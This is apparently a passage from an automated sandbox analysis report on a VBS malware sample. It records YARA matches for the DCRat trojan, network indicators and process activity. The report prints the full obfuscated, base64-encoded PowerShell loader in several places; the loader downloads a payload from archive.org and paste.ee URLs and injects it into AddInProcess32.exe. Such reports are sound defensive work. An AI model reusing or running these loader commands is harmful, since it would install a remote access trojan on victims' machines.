        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB55B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB55B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/AaTNM/0
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49706 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR

        System Summary

        barindex
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000005.00000002.2712121235.0000000005398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF88798FF4D4_2_00007FF88798FF4D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF887980EF24_2_00007FF887980EF2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF887A500564_2_00007FF887A50056
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_010165D05_2_010165D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01016EA05_2_01016EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_010162885_2_01016288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0101B6605_2_0101B660
        Source: qiEmGNhUij.vbsInitial sample: Strings found which are bigger than 50
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000005.00000002.2712121235.0000000005398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@8/7@2/3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Dggx_gg
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lz031atc.djd.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: qiEmGNhUij.vbsVirustotal: Detection: 9%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 